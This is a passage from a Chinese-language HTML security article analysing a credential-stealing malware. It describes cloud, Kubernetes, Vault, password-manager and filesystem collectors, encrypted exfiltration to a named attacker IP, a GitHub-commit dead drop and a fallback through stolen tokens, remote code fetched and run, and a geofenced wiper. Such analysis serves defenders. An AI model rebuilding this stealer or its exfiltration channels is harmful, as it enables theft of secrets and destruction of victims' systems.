SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">通过环境检测后，aggregate.py 会并发启动 collectors/ 目录下的全部 7 个采集模块，对受害主机进行系统性的敏感数据收割。以下是每个采集器的具体行为：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">AWS 采集器(collectors/aws.py)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">先从环境变量和 ~/.aws/credentials 文件读取访问密钥，还会尝试从 EC2 实例的元数据服务（169.254.169.254）获取临时凭据。拿到密钥后，以 15 线程并发遍历 19 个 AWS 区域（含美国政府云 GovCloud），逐一调用 AWS Secrets Manager 的 GetSecretValue 和 SSM Parameter Store 的 GetParameter（解密模式），把能碰到的所有 Secret 和参数全部读出来。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Azure 采集器(collectors/azure.py)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">支持四种方式获取 Azure 凭据：环境变量里的 Client Secret、服务主体证书认证(JWT bearer assertion)、Azure CLI 本地缓存、以及云实例的托管身份(Managed Identity)。拿到凭据后，通过 Azure Resource Manager API 列出所有订阅下的 Key Vault，逐个读取每个 Vault 里的全部 Secret 值。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">GCP 采集器(collectors/gcp.py)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">同样支持多种凭据来源：Service Account JSON 文件的 JWT 签名认证、刷新令牌交换、Application Default Credentials 文件、以及 GCE 实例的元数据端点。拿到凭据后，枚举 GCP Secret Manager 中的全部 Secret 并自动解密。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Kubernetes 采集器(collectors/kubernetes.py)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这个采集器设计得很完备：它内置了一个手写的 YAML 解析器，可以直接解析 kubeconfig 文件里的多集群配置；还支持 In-cluster RBAC token 认证和直接调用 K8s HTTP API。如果系统里没装 kubectl，它会自己从 <a href="https://dl.k8s.io/release/v1.28.0/bin/linux/{arch}/kubectl" target="_blank">https://dl.k8s.io/release/v1.28.0/bin/linux/{arch}/kubectl</a> 下载一个。拿到权限后，遍历所有命名空间下的所有 Secret。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">文件系统采集器(collectors/filesystem.py)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是覆盖面最广的模块，内置了约 100 个敏感文件路径，涵盖：Git 凭据(.gitconfig、.git-credentials)、Docker 配置(~/.docker/config.json)、各类包管理器注册表 token (npm、PyPI、Cargo、Composer)、云平台凭据文件(AWS、GCP、Azure CLI)、SSH 私钥目录（~/.ssh/ 下所有文件）、Terraform 和 Pulumi 的 state 文件（常含明文密钥）、CI/CD 平台配置（CircleCI、Heroku、Netlify、Vercel、Cloudflare、Railway 等十余个）、VPN 配置(Tailscale、WireGuard)、Shell 历史记录(.bash_history、.zsh_history)，以及 Claude Desktop、VSCode、Cursor 等 AI 编码工具的 MCP 配置文件。此外，该模块还会通过 Docker socket 直接通信，采集所有运行中容器的环境变量。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">密码管理器采集器(collectors/passwords.py)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">如果你的电脑上装了 1Password、Bitwarden、pass 或 gopass 这四款密码管理器中的任何一款，这个采集器会通过它们的命令行工具(op、bw、pass、gopass) 直接读取存储的全部密码条目。前提是你已经解锁了对应的密码管理器——但考虑到开发者日常使用的场景，密码管理器处于解锁状态并不罕见。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">HashiCorp Vault 采集器(collectors/vault.py)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从四个来源尝试获取 Vault Token：VAULT_TOKEN 环境变量、~/.vault-token 文件、AppRole 认证、以及 vault CLI 已登录会话。拿到 Token 后，递归遍历所有 KV 引擎（v1 和 v2 均支持）下的全部密钥路径。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">第五步：加密防截获，三条路径确保数据传回</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">窃取只是第一步，把数据传到攻击者手里同样关键。entrypoint.py 的做法是先把数据加密到无法被第三方解开，再通过多条备用路径确保传输成功——即使某条路径被封堵，也有替代方案。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">加密封装流程：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">采集数</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">据(JSON)</span></span></span><span style="white-space:pre-wrap;font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   → gzip 压缩</span></span></span><span style="white-space:pre-wrap;font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">           → 随机生成 AES-256 密钥 + 12 字节随机 IV</span></span></span><span style="white-space:pre-wrap;font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">→ AES-256-GCM 加密压缩数据</span></span></span><span style="white-space:pre-wrap;font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">→ 用攻击者的 4096-bit RSA 公钥把 AES 密钥包一层(OAEP-SHA256)</span></span></span><span style="white-space:pre-wrap;font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:11pt;font-family:Arial,sans-serif;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">→ 打包发送</span></span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">注意这个加密流程是单向的：攻击者把 RSA 公钥硬编码在 config.py 里，只有攻击者手里才有对应的私钥。即使安全团队截获了外传的数据包，没有攻击者的 RSA 私钥也无法解开 AES 密钥，更无法解密里面的内容。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">外传通道的三条路径：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">entrypoint.py 在发送数据时采用了层层递进的容错策略：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">主通道(/v1/weights)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：直接把加密包 POST 到攻击者服务器的 <a href="https://83.142.209.194/v1/weights。如果这个地址被墙了？" target="_blank">https://83.142.209.194/v1/weights。如果这个地址被墙了？</a></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">备用通道（FIRESCALE 协议）</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：程序会去搜 GitHub 公开 commit 的历史记录，找有没有人提交过含 FIRESCALE &lt;base64_url&gt;.&lt;base64签名&gt; 这种特殊格式的消息。如果找到了，它会用硬编码的 RSA 公钥验证这段消息的签名——签名通过就说明这确实是攻击者本人留下的。接着，解码出里面的备用服务器地址，往那边再试一次。这意味着攻击者可以在不修改恶意代码的情况下，随时在 GitHub 上发一条带签名的 commit 就能更换接收地址。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">GitHub 兜底通道</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：如果前两层都失败了，程序会从已窃取的数据里反查有没有 GitHub Token（ghp_ 或 github_pat_ 格式）——也就是前面文件系统采集器从 ~/.config/gh/hosts.yml 和 gh auth token 里拿到的那些。找到后，用这个 Token 在 GitHub 上创建一个公开仓库，把加密数据当作一个叫 results.json 的文件传上去。有意思的是，它创建的仓库名由 30 个俄罗斯童话和民间传说中的词汇随机组合而成，例如 BABA-YAGA-KOSCHEI-742、VASSILISA-FIREBIRD-309。这种命名方式不仅是攻击者的&#34;个人风格签名&#34;，也为后续研究人员做关联分析提供了线索。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">此外，程序启动时还会先访问一次 <a href="https://83.142.209.194/v1/models。如果攻击者在这个端点返回了内容，程序会直接将它当作一段新的恶意代码来执行——这意味着攻击者保留了随时向已感染主机下发新指令的能力。" target="_blank">https://83.142.209.194/v1/models。如果攻击者在这个端点返回了内容，程序会直接将它当作一段新的恶意代码来执行——这意味着攻击者保留了随时向已感染主机下发新指令的能力。</a></span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">第六步：地理围栏与擦除器 —— 特定区域的受害者面临的不只是窃密</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">远控程序中最具破坏力的模块是 roulette.py。它同时负责两个相反的任务：对绝大多数受害者部署长期潜伏的持久化服务，对极少数特定地区的受害者则直接毁灭系统。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">如何判断受害者所在的区域？</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">_is_israeli_system() 函数通过五个维度交叉判断：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">TZ 环境变量里有没有 Jerusalem、Tel_Aviv 或 Tehran</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 